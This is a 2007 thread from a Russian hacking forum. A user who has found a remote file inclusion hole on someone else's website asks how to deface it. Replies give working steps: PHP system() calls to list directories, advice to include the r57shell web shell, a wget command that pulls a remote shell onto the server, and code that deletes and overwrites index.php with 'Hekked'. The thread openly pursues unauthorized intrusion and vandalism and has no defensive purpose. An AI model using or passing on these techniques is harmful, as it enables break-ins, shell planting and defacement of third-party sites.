Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
Не работает system("echo Hacked > index.php"); |

19.08.2007, 16:14
|
|
Новичок
Регистрация: 16.07.2007
Сообщений: 21
Провел на форуме: 158327
Репутация:
0
|
|
Не работает system("echo Hacked > index.php");
Нашёл на сайте удалённый инклуд. Могу подключать и выполнять любые PHP скрипты. Но есть одно но
Я не могу на том сервере создавать и писать в файлы
PHP код:
system("echo Hacked > index.php");
не работает. Через тоже ессно ничего не выходит
Как можно это обойти?
И вопрос в догонку:
Как мне получить список файлов каталога, который находится на порядок выше?
PHP код:
echo system("cd ../");
$cmd = "ls";
echo "command: <b>" . $cmd . "</b><br>";
echo system($cmd);
не работает...
|
|
|

19.08.2007, 16:34
|
|
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме: 2924346
Репутация:
1719
|
|
system() может быть запрещено использовать сервером
по поводу fopen() - это уже странно.. ты уверен, что прав хватает? я сомневаюсь...
|
|
|

19.08.2007, 16:46
|
|
Новичок
Регистрация: 16.07.2007
Сообщений: 21
Провел на форуме: 158327
Репутация:
0
|
|
system разрешён. потому как
PHP код:
$cmd = "ls";
echo "command: <b>" . $cmd . "</b><br>";
echo system($cmd);
выполняется на ура.
А вот то что прав не хватает - скорее оно так и есть. Что можно предпринять в этом случае?
|
|
|

19.08.2007, 16:55
|
|
Пачка маргарина
Регистрация: 14.07.2005
Сообщений: 964
Провел на форуме: 4646474
Репутация:
1424
|
|
проинклудь шел какойнить и посмотри
|
|
|

19.08.2007, 17:22
|
|
Новичок
Регистрация: 16.07.2007
Сообщений: 21
Провел на форуме: 158327
Репутация:
0
|
|
Пытался проинклудить r57shell, но в итоге получаю пустую страницу...
|
|
|

19.08.2007, 17:31
|
|
Участник форума
Регистрация: 07.12.2006
Сообщений: 192
Провел на форуме: 492591
Репутация:
123
|
|
Сообщение от blackbarrie
Нашёл на сайте удалённый инклуд. Могу подключать и выполнять любые PHP скрипты. Но есть одно но
Я не могу на том сервере создавать и писать в файлы
PHP код:
system("echo Hacked > index.php");
не работает. Через тоже ессно ничего не выходит
Как можно это обойти?
И вопрос в догонку:
Как мне получить список файлов каталога, который находится на порядок выше?
PHP код:
echo system("cd ../");
$cmd = "ls";
echo "command: <b>" . $cmd . "</b><br>";
echo system($cmd);
не работает...
Не понял, зачем использовать echo c system(). Результат она и так на экран выводит.
Команда для листинга верхнего каталога -
ls /../
|
|
|

19.08.2007, 17:34
|
|
Новичок
Регистрация: 16.07.2007
Сообщений: 21
Провел на форуме: 158327
Репутация:
0
|
|
Опа, спасибо... а я пытался сделать
Не понял, зачем использовать echo c system(). Результат она и так на экран выводит.
 буду знать
Но всё же, как задефейсить в данном случае? 
|
|
|

19.08.2007, 17:42
|
|
Участник форума
Регистрация: 07.12.2006
Сообщений: 192
Провел на форуме: 492591
Репутация:
123
|
|
С помощью качалки стоящей на сервере скачиваешь полноценный шелл - это либо wget, curl и т.д. если не стоит ничего есть команда lwp-mirror, почитай вобще в гуглу
что-то типа - system('wget http://shell.php')
|
|
|

19.08.2007, 17:48
|
|
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме: 9751379
Репутация:
3812
|
|
PHP код:
unlink('index.php');
$data='Hekked';
$fp=fopen('./index.php','wb');
fputs($fp,$data);
fclose($fp);
__________________
|
|
|

19.08.2007, 18:10
|
|
Новичок
Регистрация: 16.07.2007
Сообщений: 21
Провел на форуме: 158327
Репутация:
0
|
|
Выполняю комманду system('wget http://site/shell.txt'), а потом system('ls')
Изменений не видно...
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|